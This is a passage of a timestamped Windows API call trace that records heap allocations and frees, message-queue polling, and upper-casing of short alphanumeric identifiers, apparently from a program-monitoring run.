RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0208.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad50 [0208.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad20 [0208.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0208.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad68 [0208.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0208.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0208.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0208.175] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0208.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0208.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad68 | out: hHeap=0x2af0000) returned 1 [0208.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0208.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0208.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0208.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0208.175] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0208.175] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0208.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0208.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0208.175] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0208.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaac60 [0208.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73c50 [0208.176] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0208.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0208.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad20 [0208.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadb0 [0208.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0208.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadf8 [0208.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0208.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0208.176] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0208.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0208.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0208.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0208.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0208.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0208.176] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0208.176] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0208.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0208.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad20 [0208.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad38 [0208.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0208.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadb0 [0208.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0208.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0208.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad38 | out: hHeap=0x2af0000) returned 1 [0208.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0208.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0208.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73c50 | out: hHeap=0x2af0000) returned 1 [0208.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac60 | out: hHeap=0x2af0000) returned 1 [0208.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0208.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0208.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac78 [0208.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabe8 [0208.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0208.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad20 [0208.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0208.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0208.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac78 | out: hHeap=0x2af0000) returned 1 [0208.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0208.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0208.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0208.177] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0208.177] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0208.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0208.178] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0208.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0208.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0208.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaca8 [0208.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73f20 [0208.178] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0208.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0208.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad68 [0208.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac00 [0208.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0208.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad38 [0208.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0208.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0208.178] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0208.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0208.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad38 | out: hHeap=0x2af0000) returned 1 [0208.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0208.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad68 | out: hHeap=0x2af0000) returned 1 [0208.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0208.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0208.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0208.178] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0208.179] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0208.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacc0 [0208.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac60 [0208.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0208.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac78 [0208.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0208.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac78 | out: hHeap=0x2af0000) returned 1 [0208.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac60 | out: hHeap=0x2af0000) returned 1 [0208.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0208.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0208.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0208.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac00 [0208.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaba0 [0208.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0208.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabb8 [0208.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabb8 | out: hHeap=0x2af0000) returned 1 [0208.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0208.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0208.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0208.179] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73f20 | out: hHeap=0x2af0000) returned 1 [0208.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaca8 | out: hHeap=0x2af0000) returned 1 [0208.179] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0208.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0208.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0208.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0208.180] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0208.180] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0208.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0208.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0208.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0208.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0208.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0208.180] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0208.180] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0208.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0208.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadb0 [0208.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0208.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0208.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0208.180] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0208.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaad20 [0208.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0208.180] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0208.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.182] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0208.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac90 | out: hHeap=0x2af0000) returned 1 [0208.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad38 | out: hHeap=0x2af0000) returned 1 [0208.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac18 | out: hHeap=0x2af0000) returned 1 [0208.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0208.182] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0208.182] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0208.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadc8 | out: hHeap=0x2af0000) returned 1 [0208.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0208.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0208.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0208.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0208.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0208.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0208.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0208.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0208.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac18 | out: hHeap=0x2af0000) returned 1 [0208.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0208.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadc8 | out: hHeap=0x2af0000) returned 1 [0208.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0208.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0208.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0208.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0208.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadc8 | out: hHeap=0x2af0000) returned 1 [0208.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0208.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac48 | out: hHeap=0x2af0000) returned 1 [0208.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad68 | out: hHeap=0x2af0000) returned 1 [0208.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37d5150 | out: hHeap=0x2af0000) returned 1 [0208.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0208.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0208.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0208.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0208.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0208.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 